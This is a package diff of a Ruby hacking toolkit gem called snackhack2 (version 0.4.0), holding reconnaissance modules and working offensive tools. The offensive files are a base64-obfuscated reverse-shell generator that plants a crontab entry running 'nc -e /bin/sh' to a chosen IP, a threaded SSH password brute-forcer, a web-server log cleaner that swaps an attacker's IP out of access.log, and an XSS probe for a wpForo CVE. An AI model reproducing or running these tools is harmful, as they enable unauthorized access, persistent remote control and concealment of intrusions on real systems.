snackhack2 0.4.0

data/lib/snackhack2/phone_number.rb

@@ -0,0 +1,57 @@
+require 'httparty'
+require 'spidr'
+module Snackhack2
+  class PhoneNumber
+    attr_accessor :save_file
+
+    def initialize(site, save_file: true)
+      @site = site
+      @save_file = save_file
+    end
+
+    def save_file
+      @save_file
+    end
+
+    def run
+      numbers = []
+      http = Snackhack2::get(@site)
+      if http.code == 200
+        regex = http.body
+        t = regex.scan(/((\+\d{1,2}\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4})/)
+        out = t.map { |n| n[0] }.compact
+        numbers << out
+      else
+        puts "[+] Status code: #{http.code}"
+      end
+      if !numbers.empty?
+        if @save_file
+          hostname = URI.parse(@site).host
+          puts "[+] Saving to #{hostname}_phone_numbers.txt..."
+          Snackhack2::file_save(@site, "phone_numbers", numbers.join("\n"))
+        end
+      end
+    end
+
+    def spider
+      phone_numbers = []
+      Spidr.start_at(@site, max_depth: 4) do |agent|
+        agent.every_page do |page|
+          body = page.to_s
+          if body.scan(/((\+\d{1,2}\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4})/)
+            pn = body.scan(/((\+\d{1,2}\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4})/)[0]
+            if !pn.nil?
+              pn = pn.compact.select { |i| !i.to_s.nil? }.shift
+              if !phone_numbers.include?(pn.to_s)
+                phone_numbers << pn
+              end
+            end
+          end
+        end
+      end
+      if !phone_numbers.empty?
+        Snackhack2::file_save(@site, "phonenumbers", phone_numbers.join("\n")) if @save_file
+      end
+    end
+  end
+end

data/lib/snackhack2/portscan.rb

@@ -0,0 +1,36 @@
+# frozen_string_literal: true
+
+require 'packetfu'
+module Snackhack2
+  class PortScan
+    def initialize(ip)
+      @ip = ip
+    end
+
+    def run
+      threads = []
+      ports = [*1..1000]
+      ports.each { |i| threads << Thread.new { tcp(i) } }
+      threads.each(&:join)
+    end
+
+    def tcp(i)
+      open_ports = []
+      begin
+        Timeout.timeout(1) do
+          s = TCPSocket.new(@ip, i)
+          s.close
+          open_ports << i
+        rescue Errno::ECONNREFUSED, Errno::EHOSTUNREACH
+          return false
+        end
+      rescue Timeout::Error
+      end
+      return if open_ports.empty?
+
+      open_ports.each do |port|
+        puts "#{port} is open"
+      end
+    end
+  end
+end

data/lib/snackhack2/reverse_shell.rb

@@ -0,0 +1,16 @@
+require 'base64'
+module Snackhack2
+  class ReverseShell
+    def initialize(ip, port)
+      @ip   = ip
+      @port = port
+    end
+
+    def run
+      c = %Q{#!/bin/bash
+			line="* * * * * nc -e /bin/sh #{@ip} #{@port}"
+			(crontab -u $(whoami) -l; echo "$line" ) | crontab -u $(whoami) -}
+      puts "echo -n '#{Base64.encode64(c)}' | base64 -d >> t.sh; bash t.sh; rm t.sh;".delete!("\n")
+    end
+  end
+end

data/lib/snackhack2/robots.rb

@@ -0,0 +1,80 @@
+# frozen_string_literal: true
+
+module Snackhack2
+  class Robots
+    def initialize(site, save_file: true)
+      @site = site
+      @http = Snackhack2::get(File.join(@site, "robots.txt"))
+      @save_file = save_file
+    end
+
+    attr_reader :save_file
+
+    def run
+      save_txt_file = ''
+      allow    = allow_robots
+      disallow = disallow_robots
+      if @save_file
+        save_txt_file += "ALLOW:\n\n"
+        unless allow.empty?
+          allow.each do |list|
+            save_txt_file += list
+          end
+        end
+        save_txt_file += "DISALLOW:\n\n"
+        unless disallow.empty?
+          disallow.each do |list|
+            save_txt_file += list
+          end
+        end
+      else
+        puts allow
+        puts disallow
+      end
+      Snackhack2::file_save(@site, "robots", save_txt_file) if @save_file
+    end
+
+    def allow_robots
+      allow_dir = []
+      if @http.code == 200
+        body = @http.body.lines
+        body.each do |l|
+          allow_dir << l.split('Allow: ')[1] if l.match(/Allow:/)
+        end
+      else
+        puts "[+] Not giving code 200.\n"
+      end
+      open_links = []
+      allow_dir.each do |path|
+        link = Snackhack2::get(File.join(@site, path.strip))
+        if link.code == 200
+          valid_links = "#{@site}#{path}"
+          open_links << valid_links
+        end
+      end
+      open_links
+    end
+
+    def disallow_robots
+      disallow_dir = []
+      if @http.code == 200
+        body = @http.body.lines
+        body.each do |l|
+          disallow_dir << l.split('Disallow: ')[1] if l.match(/Disallow:/)
+        end
+      else
+        puts "[+] Not giving code 200.\n"
+      end
+      open_links = []
+      disallow_dir.each do |path|
+        link = Snackhack2::get(File.join(@site, path.strip))
+        if link.code == 200
+          valid_links = "#{@site}#{path}"
+          open_links << valid_links
+        end
+      rescue StandardError
+      end
+      open_links
+    end
+  end
+end

data/lib/snackhack2/sitemap.rb

@@ -0,0 +1,22 @@
+require 'httparty'
+require 'nokogiri'
+module Snackhack2
+  class SiteMap
+    def initialize(site)
+      @site = site
+    end
+
+    def run
+      sm = Snackhack2::get(File.join(@site, "sitemap.xml"))
+      if sm.code == 200
+        if !sm.body.include?("Not Found")
+          Snackhack2::file_save(@site, "site.xml", sm.body)
+        else
+          puts "[+] Eh. I don't think the site has a sitemap. Manually check just in case... :(\n\n"
+        end
+      else
+        puts "[+] Status Code: #{sm.code}"
+      end
+    end
+  end
+end

data/lib/snackhack2/sshbrute.rb

@@ -0,0 +1,32 @@
+# frozen_string_literal: true
+
+require 'net/ssh'
+module Snackhack2
+  class SSHBute
+    def initialize(ip, list: nil)
+      @ip = ip
+      @list = list
+      @success_list = []
+    end
+
+    def list
+      File.join(__dir__, 'lists', 'sshbrute.txt')
+    end
+
+    def run
+      threads = []
+      File.readlines(list).each { |usr, pass| threads << Thread.new { brute(usr, pass) } }
+      threads.each(&:join)
+
+      p @success_list
+    end
+
+    def brute(username, pass)
+      Net::SSH.start(@ip, username, password: pass, timeout: 1) do |ssh|
+        @success_list << [username, pass]
+        ssh.exec!('hostname')
+      end
+    rescue Net::SSH::AuthenticationFailed
+    end
+  end
+end

data/lib/snackhack2/subdomains.rb

@@ -0,0 +1,68 @@
+# frozen_string_literal: true
+
+require 'uri'
+require 'resolv'
+require 'async/http/internet'
+module Snackhack2
+  class Subdomains
+    def initialize(site, wordlist: nil)
+      @site     = site
+      @wordlist = wordlist
+    end
+
+    def site
+      @site.gsub("https://", "")
+    end
+
+    def wordlist
+      File.join(__dir__, 'lists', 'subdomains.txt')
+    end
+
+    def run
+      File.readlines(wordlist).each do |sd|
+        resolv(sd)
+      end
+    end
+
+    def brute
+      found = ""
+      File.readlines(wordlist).each do |l|
+        s = "#{l.strip}.#{site}"
+        begin
+          puts File.join("https://", s)
+          g = Snackhack2::get(File.join("https://", s))
+          if g.code == 200
+            found += s + "\n"
+          elsif g.code == 300
+            found += s + "\n"
+          else
+            puts "HTTP Code: #{g.code}"
+          end
+        rescue => e
+          puts e
+        end
+      end
+      Snackhack2::file_save(@site, "subdomain_brute", found)
+    end
+
+    def resolv(sd)
+      # NOTE: this is really slow & multi thread does not work
+      # due to resolv
+      active = []
+      subdomains = []
+      Resolv::DNS.open do |dns|
+        ress = dns.getresources "#{sd}.#{@site}", Resolv::DNS::Resource::IN::A
+        unless ress.map(&:address).empty?
+          address = ress.map(&:address)
+          unless active.include?(address)
+            active << address
+            subdomains << "#{sd}.#{@site}" unless subdomains.include?(sd)
+          end
+        end
+      end
+      host = URI.parse(@site).host
+      File.open("#{host}_subdomains.txt", 'w+') { |file| file.write(subdomains.join("\n")) }
+      File.open("#{host}_ips.txt", 'w+') { |file| file.write(active.join("\n")) }
+    end
+  end
+end

data/lib/snackhack2/subdomains2.rb

@@ -0,0 +1,43 @@
+require 'async/http/internet'
+module Snackhack2
+  class Subdomains2
+    def initialize(site)
+      @site = site
+      @urls = []
+    end
+
+    def wordlist
+      File.join(__dir__, 'lists', 'subdomains.txt')
+    end
+
+    def save
+      Snackhack2::file_save(@site, "subdomain_brute2", @urls.join("\n"))
+    end
+
+    def run
+      File.readlines(wordlist).each do |a|
+        url = "https://" + a.strip + "." + @site.gsub("https://", "")
+        fetch(url)
+        puts url
+      end
+      save
+    end
+
+    def fetch(url)
+      begin
+        Sync do |task|
+          task.with_timeout(2) do
+            internet = Async::HTTP::Internet.new
+            m = internet.get(url, { "user-agent" => Snackhack2::UA })
+            if m.status == 200 or m.status == 301
+              @urls << url
+            end
+            m.read
+          end
+        end
+      rescue => e
+        puts e
+      end
+    end
+  end
+end

data/lib/snackhack2/tomcat.rb

@@ -0,0 +1,21 @@
+require 'nokogiri'
+module Snackhack2
+  class TomCat
+    def initialize(site)
+      @site = site
+    end
+
+    def run
+      tc = Snackhack2::get(File.join(@site, "/docs/"))
+      if tc.code == 404
+        if tc.body.include?("Tomcat")
+          doc = Nokogiri::HTML(tc.body)
+          version = doc.at('h3').text
+          puts "[+] Looks like the site is Tomcat, running #{version}."
+        end
+      else
+        puts "[+] Status code: #{tc.code}"
+      end
+    end
+  end
+end

data/lib/snackhack2/version.rb

@@ -0,0 +1,5 @@
+# frozen_string_literal: true
+
+module Snackhack2
+  VERSION = '0.4.0'
+end

data/lib/snackhack2/webserver_log_cleaner.rb

@@ -0,0 +1,26 @@
+# frozen_string_literal: true
+
+module Snackhack2
+  class WebServerCleaner
+    def initialize(ip, path: File.join('/var/log', 'access.log'))
+      @ip   = ip
+      @path = path
+    end
+
+    def run
+      out = ''
+      # generate random IP
+      new_ip = Array.new(4) { rand(256) }.join('.')
+      File.readlines(@path).each do |line|
+        old_ip = line.match(/((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)/)
+        out += if old_ip.to_s == @ip
+                 line.gsub(old_ip.to_s, new_ip)
+               else
+                 line
+               end
+      end
+      File.delete(@path)
+      File.open(@path, 'w+') { |file| file.write(out) }
+    end
+  end
+end

data/lib/snackhack2/website_links.rb

@@ -0,0 +1,28 @@
+# frozen_string_literal: true
+
+require 'nokogiri'
+require 'open-uri'
+module Snackhack2
+  class WebsiteLinks
+    attr_accessor :save_file
+
+    def initialize(site, save_file: true)
+      @site = site
+      @save_file = save_file
+    end
+
+    def run
+      doc = Nokogiri::HTML(URI.open(@site))
+      links = doc.xpath('//a')
+      all_links = links.map { |e| e['href'] }.compact
+      content = all_links.uniq.join("\n")
+      if @save_file
+        Snackhack2::file_save(@site, "links", content)
+      else
+        all_links.each do |links|
+          puts links
+        end
+      end
+    end
+  end
+end

data/lib/snackhack2/website_meta.rb

@@ -0,0 +1,19 @@
+# frozen_string_literal: true
+
+require 'nokogiri'
+require 'open-uri'
+module Snackhack2
+  class WebsiteMeta
+    def initialize(site)
+      @site = site
+    end
+
+    def run
+      doc = Nokogiri::HTML(URI.open(@site))
+      posts = doc.xpath('//meta')
+      posts.each do |link|
+        puts "#{link.attributes['name']}: #{link.attributes['content']}" unless link.attributes['name'].nil?
+      end
+    end
+  end
+end

data/lib/snackhack2/wordpress.rb

@@ -0,0 +1,123 @@
+# frozen_string_literal: true
+
+require 'json'
+module Snackhack2
+  class WordPress
+    attr_accessor :save_file, :site
+
+    def initialize(site, save_file: true)
+      @site = site
+      @save_file = save_file
+    end
+
+    def run
+      wp_login
+      yoast_seo
+      users
+      wp_content_uploads
+      all_in_one_seo
+      wp_log
+    end
+
+    def file_site
+      @site = @site.gsub('https://', '')
+    end
+
+    def users
+      found_users = ''
+      begin
+        users = Snackhack2::get(File.join(@site, "wp-login", "wp", "users")).body
+        json = JSON.parse(users)
+        json.each do |k|
+          found_users += "#{k['name']}\n"
+        end
+      rescue StandardError => e
+        puts "[+] users not found\n\n\n"
+      end
+
+      if !found_users.empty?
+        if @save_file
+          Snackhack2::file_save(@site, "users", found_users)
+        else
+          puts found_users
+        end
+      end
+    end
+
+    def wp_content_uploads
+      s = Snackhack2::get(File.join(@site, '/wp-content/uploads/'))
+      if s.code == 200
+        if s.body.include?('Index of')
+          puts "[+] #{File.join(@site, '/wp-content/uploads/')} is valid..."
+        end
+      end
+    end
+
+    def wp_login
+      percent = 0
+      ## todo: maybe add Bayes Theorem to detect wp
+      wp = ['wp-includes', 'wp-admin', 'Powered by WordPress', 'wp-login.php', 'yoast.com/wordpress/plugins/seo/',
+            'wordpress-login-url.jpg', 'wp-content/themes/', 'wp-json']
+      login = Snackhack2::get(File.join(@site, "wp-login.php"))
+      if login.code == 200
+        wp.each do |path|
+          percent += 10 if login.body.include?(path)
+        end
+      end
+      login2 = Snackhack2::get(@site.to_s)
+      wp.each do |path|
+        percent += 10 if login2.body.include?(path)
+      end
+      puts "Wordpress Points: #{percent}"
+    end
+
+    def yoast_seo
+      ys = Snackhack2::get(@site)
+      if ys.code == 200
+        if ys.body.match(/ This site is optimized with the Yoast SEO plugin\s.\d\d.\d/)
+          puts "#{ys.body.match(/ This site is optimized with the Yoast SEO plugin\s.\d\d.\d/)}"
+        end
+      end
+    end
+
+    def all_in_one_seo
+      alios = Snackhack2::get(@site)
+      if alios.code == 200
+        if alios.body.scan(/(All in One SEO Pro\s\d.\d.\d)/)
+          puts "Site is using the plugin: #{alios.body.match(/(All in One SEO Pro\s\d.\d.\d)/)}"
+        end
+      end
+    end
+
+    def wp_log
+      wplog_score = 0
+      wp = ['\wp-content\plugins', 'PHP Notice', 'wp-cron.php', '/var/www/html', 'Yoast\WP\SEO', 'wordpress-seo']
+      log = Snackhack2::get(File.join(@site, "/wp-content/debug.log"))
+      if log.code == 200
+        puts "[+] #{File.join(@site, "/wp-content/debug.log")} is giving status 200. Now double checking...\n\n\n"
+        wp.each do |e|
+          if log.body.include?(e)
+            wplog_score += 10
+          end
+        end
+      end
+      puts "WordPress Log score: #{wplog_score}...\n\n\n"
+    end
+
+    def wp_plugin
+      wp_plugin_score = 0
+      wp = ['Index of', 'Name', 'Last modified', 'Size', 'Parent Directory', '/wp-content/plugins']
+      plug = Snackhack2::get(File.join(@site, '/wp-content/plugins/'))
+      if plug.code == 200
+        puts "[+] Looks like #{File.join(@site,
+                                         '/wp-content/plugins/')} is giving status 200. Checking to make sure...\n\n\n"
+        wp.each do |e|
+          if plug.body.include?(e)
+            wp_plugin_score += 10
+          end
+        end
+      end
+      puts "[+] WordPress Plugin Score: #{wp_plugin_score}"
+    end
+  end
+end

data/lib/snackhack2/wpForo_Forum.rb

@@ -0,0 +1,21 @@
+# frozen_string_literal: true
+
+require 'httparty'
+module Snackhack2
+  class WPForoForum
+    def initialize(site)
+      @site = site
+    end
+
+    # wpForo Forum <= 1.4.11 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+    # source: https://github.com/prok3z/Wordpress-Exploits/tree/main/CVE-2018-11709
+    def run
+      wp = HTTParty.get(File.join(@site, '/index.php/community/?%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E'))
+      if wp.code == 200
+        puts "[+] #{@site} is vulnerable to CVE-2018-11709..." if wp.match(/XSS/)
+      else
+        puts "[+] HTTP code #{wp.code}"
+      end
+    end
+  end
+end

data/lib/snackhack2.rb

@@ -0,0 +1,59 @@
+# frozen_string_literal: true
+
+require 'uri'
+require 'httparty'
+require_relative 'snackhack2/version'
+require_relative 'snackhack2/bannergrabber'
+require_relative 'snackhack2/wordpress'
+require_relative 'snackhack2/portscan'
+require_relative 'snackhack2/iplookup'
+require_relative 'snackhack2/robots'
+require_relative 'snackhack2/subdomains'
+require_relative 'snackhack2/sshbrute'
+require_relative 'snackhack2/website_meta'
+require_relative 'snackhack2/google_analytics'
+require_relative 'snackhack2/cryptoextractor'
+require_relative 'snackhack2/website_links'
+require_relative 'snackhack2/webserver_log_cleaner'
+require_relative 'snackhack2/wpForo_Forum'
+require_relative 'snackhack2/WP_Symposium'
+require_relative 'snackhack2/phone_number'
+require_relative 'snackhack2/emails'
+require_relative 'snackhack2/drupal'
+require_relative 'snackhack2/Honeywell_PM43'
+require_relative 'snackhack2/sitemap'
+require_relative 'snackhack2/tomcat'
+require_relative 'snackhack2/subdomains2'
+require_relative 'snackhack2/reverse_shell'
+
+module Snackhack2
+  UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
+  def self.read_serverversion
+    files = Dir['*.txt']
+    files.each do |f|
+      read = File.read(f)
+      puts "#{f.split('_')[0]}: #{read}"
+    end
+  end
+
+  def self.clean_serverversion
+    #  this wil remove all files that have '_serverversion'
+    #  in the file name
+    Dir['*.txt'].each do |file|
+      if file.include?('_serverversion')
+        puts "[+] deleting #{file}..."
+        File.delete(file)
+      end
+    end
+  end
+
+  def self.file_save(site, type, content)
+    hostname = URI.parse(site).host
+    File.open("#{hostname}_#{type}.txt", 'w+') { |file| file.write(content) }
+    puts "[+] Saving file to #{hostname}_#{type}.txt..."
+  end
+
+  def self.get(site)
+    HTTParty.get(site, { headers: { "User-Agent" => UA } })
+  end
+end